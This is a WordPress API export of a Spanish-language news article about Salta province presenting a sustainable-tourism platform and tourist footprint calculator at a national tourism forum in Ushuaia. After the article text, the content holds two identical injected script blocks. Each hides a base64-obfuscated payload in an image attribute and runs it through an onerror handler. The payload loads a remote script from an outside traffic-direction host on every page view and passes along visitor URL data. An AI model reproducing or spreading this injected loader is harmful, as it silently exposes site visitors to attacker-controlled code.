{"id":2677,"date":"2023-05-30T10:28:57","date_gmt":"2023-05-30T13:28:57","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2677"},"modified":"2025-08-14T00:16:08","modified_gmt":"2025-08-14T03:16:08","slug":"salta-participo-en-el-3er-foro-nacional-de-turismo-en-ushuaia","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2677","title":{"rendered":"Salta particip\u00f3 en el 3er Foro Nacional de Turismo en Ushuaia"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#a4072e\"><em>En la oportunidad se present\u00f3 \u201cSalta Argentina, hacia un destino sin huellas\u201d, la primera plataforma colaborativa del pa\u00eds que mide todos los \u00edndices y muestra acciones a los turistas que visitan la Provincia para convertir a Salta en un destino sostenible.<\/em><\/h4>\n\n\n\n<p>Se llev\u00f3 adelante en la ciudad de Ushuaia el 3er Foro Nacional de Turismo, organizado por el Ministerio de Turismo y Deportes de la Naci\u00f3n, bajo el lema \u201cLa Re-Evoluci\u00f3n de los destinos emergentes en Argentina\u201d que cont\u00f3 con mesas redondas de debate, presentaci\u00f3n de casos y charlas magistrales con representantes nacionales e internacionales.<\/p>\n\n\n\n<p>Dentro de ellas se destac\u00f3 la presentaci\u00f3n que llev\u00f3 adelante la secretar\u00eda de Turismo de Salta, Nadia Loza denominada \u201cSalta-Argentina, hacia un destino sin huellas\u201d donde se dio a conocer el programa \u201cSalta, por un destino sostenible\u201d, cuyo \u201cobjetivo en t\u00e9rminos did\u00e1cticos es mantener e incrementar la capacidad de Salta de seguir siendo un destino elegido a nivel nacional e internacional trabajando sobre los denominados nuevos lujos esenciales: el ambiente saludable, los alimentos de cercan\u00eda, el aire puro y las culturas identitarias vivas\u201d, explic\u00f3 la funcionaria.<\/p>\n\n\n\n<p>\u201cSalta es la primera provincia argentina en contar con un Plan Integral de Sostenibilidad metodol\u00f3gicamente dise\u00f1ado que tiene como prop\u00f3sito materializar la visi\u00f3n del destino Salta establecida en nuestro Plan Estrat\u00e9gico Liderar: ser l\u00edderes en la Argentina y en la regi\u00f3n posicion\u00e1ndonos con nuestros atributos diferenciales y siendo un destino sostenible.<\/p>\n\n\n\n<p>Para lo cual se busc\u00f3 materializar esa visi\u00f3n en un plan concreto de sostenibilidad que tiene componentes conceptuales y generales y culmina con proyectos y programas concretos que en principio van a ser sencillos, realizables y simples para que a medida que todos los actores vinculados a la actividad tur\u00edstica de Salta vayan ganando experiencia, podamos abordar proyectos m\u00e1s complejos\u201d, agreg\u00f3 Loza.<\/p>\n\n\n\n<p>Asimismo, la Secretaria de Turismo dio detalles de la plataforma digital que ser\u00e1 uno de los programas ejecutivo que formar\u00e1n parte de este plan donde \u201cSalta contar\u00e1 por un lado con un mapa que dar\u00e1 visibilidad a los distintos actores de la cadena de valor tur\u00edstica de la Provincia que lleven adelante iniciativas y buenas pr\u00e1cticas sostenibles ambientales, sociales y econ\u00f3micas.<\/p>\n\n\n\n<p>Y por otro dispondr\u00e1 de una calculadora tur\u00edstica propia, absolutamente innovadora en Latinoam\u00e9rica, que permitir\u00e1 que cada turista que visita Salta pueda medir su huella tur\u00edstica, saber cu\u00e1l es el impacto que deja en el destino al visitarlo y en una segunda etapa va a tener la posibilidad de compensar esa huella.\u201d<\/p>\n\n\n\n<p>El Foro de Turismo Sostenible permiti\u00f3 a actores del sector p\u00fablico y privado vinculados a la actividad tur\u00edstica compartir experiencias, propuestas de valor y miradas entorno a la integraci\u00f3n regional, la transformaci\u00f3n digital y la sustentabilidad con el fin de estimular el desarrollo inteligente y sostenible de los destinos emergentes.<\/p>\n\n\n\n<p>En representaci\u00f3n del Ministerio de Turismo y Deportes de Salta participaron tambi\u00e9n la subsecretaria de Promoci\u00f3n Tur\u00edstica, Laura Alcorta y la directora de Capacitaci\u00f3n, Alicia Ibarguren.&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/salta-participo-en-el-3er-foro-nacional-de-turismo-en-ushuaia-89850\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretaria de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En la oportunidad se present\u00f3 \u201cSalta Argentina, hacia un destino sin huellas\u201d, la primera plataforma colaborativa del pa\u00eds que mide todos los \u00edndices y muestra acciones a los turistas que visitan la Provincia para convertir a Salta en un destino sostenible. Se llev\u00f3 adelante en la ciudad de Ushuaia el 3er Foro Nacional de Turismo, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2678,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[21],"tags":[],"class_list":{"0":"post-2677","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2677"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2677"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2677\/revisions"}],"predecessor-version":[{"id":7073,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2677\/revisions\/7073"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2678"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2677"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2677"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2677"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}